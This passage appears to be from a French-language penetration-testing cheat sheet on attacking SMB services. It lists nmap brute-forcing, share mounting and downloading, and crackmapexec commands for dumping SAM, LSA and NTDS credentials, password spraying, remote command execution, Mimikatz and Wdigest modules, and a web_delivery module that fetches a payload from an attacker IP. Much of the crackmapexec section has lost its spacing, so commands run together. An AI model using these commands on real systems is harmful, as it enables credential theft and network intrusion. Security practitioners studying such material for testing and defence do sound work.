Il existe également un script nmap permettant de brute force la connexion à un service SMB.
Utilisation:
$ nmap --script smb-brute -p445 <target IP>
Attention: Tenter de brute force un service SMB peut entraîner le blocage des comptes
Monter un fichier partagé
Pour monter un fichier partagé on utilise la commande mount.
Exemples d'utilisation:
$ mount -t cifs //<target IP>/<Fichier> /mnt/partage
$ mount -t cifs -o "username=<username>,password=<password>" //<target IP>/<Fichier> /mnt/partage
Télécharger un fichier partagé
Il est possible de télécharger un fichier partagé avec smbmap comme ceci par exemple.
$ smbmap -R <Dossier> -H <target IP> -A <Fichier> -q
Crackmapexec
Mindmap
Quelques commandes intéressantes proposées par crackmapexec:
Enumération et dump:
# Basiquescrackmapexecsmb<IP>/24crackmapexecsmb<targetIP>-u'<username>'-p'<password>'crackmapexecsmb<targetIP>-u'<username>'-p'<password>'--shares# Enumeration des fichiers textescrackmapexecsmb<targetIP>-u'<username>'-p'<password>'--spiderC\$ --patterntxt# Enumeration des fichiers de logscrackmapexecsmb<targetIP>-u'<username>'-p'<password>'--spiderC\$ --patternlog# Dump SAMcrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--sam# Dump LSASScrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--lsa# Dump NTDS (SRDUAPI)crackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--ntdsdrsuapi# Dump NTDS (VSS)crackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--ntdsvss# Dump sessionscrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--sessions# Dump des utilisateurs connectéscrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--loggedon-users# Enumeration des disquescrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--disks# Enumeration des utilisateurscrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--users# Enumeration des groupescrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--groups# Dump de la politique de mots de passescrackmapexecsmb<targetIP> [-d <domaine>]-u'<username>'-p'<password>'--pass-pol
Bruteforce:
# Bruteforce d'un utilisateur spécifique dans une plage IPcrackmapexecsmb<IP>/24-u'<user to find>''<username>'-p'<password>'# Attaque par dictionnairecrackmapexecsmb<IP>/24-u/root/Desktop/user.txt-p/root/Desktop/pass.txt# Password Sprayingcrackmapexecsmb<targetIP>-u/root/Desktop/user.txt-p'<password>'--rid-brutecrackmapexecsmb<targetIP>-u/root/Desktop/user.txt-p'<password>'--continue-on-success
Exécution de commande à distance
crackmapexecsmb<targetIP>-u'<username>'-p'<password>'-x'<command>'# Avec planificateur de tâchecrackmapexecsmb<targetIP>-u'<username>'-p'<password>'-x'<command>'--exec-methodatexec# Avec le service WMIcrackmapexecsmb<targetIP>-u'<username>'-p'<password>'-x'<command>'--exec-methodwmiexeccrackmapexecsmb<targetIP>-u'<username>'-p'<password>'-x'<command>'--wmi"WMI command"
Modules:
# Voir les modules enregistréscrackmapexecsmb-L# Module Mimikatzcrackmapexecsmb<targetIP>-u'<username>'-p'<password>'-Mmimikatzcrackmapexecsmb<targetIP>-u'<username>'-p'<password>'-Mmimikatz-oCOMMAND='<command>'# Module Wdigest (créer une clé de registre grâce à laquelle les mots de passe sont stockés en mémoire)crackmapexecsmb<targetIP>-u'<username>'-p'<password>'-Mwdigest-oACTION='<command>'# Module enum_dnscrackmapexecsmb<targetIP>-u'<username>'-p'<password>'-Menum_dns# Module web_delivery à utiliser avec un handler sur metasploitcrackmapexec smb <target IP> -u '<username>' -p '<password>' -M web_sdelivery -o URL=http://<attacker IP>:<port>/rlNdPdZQMeYWLF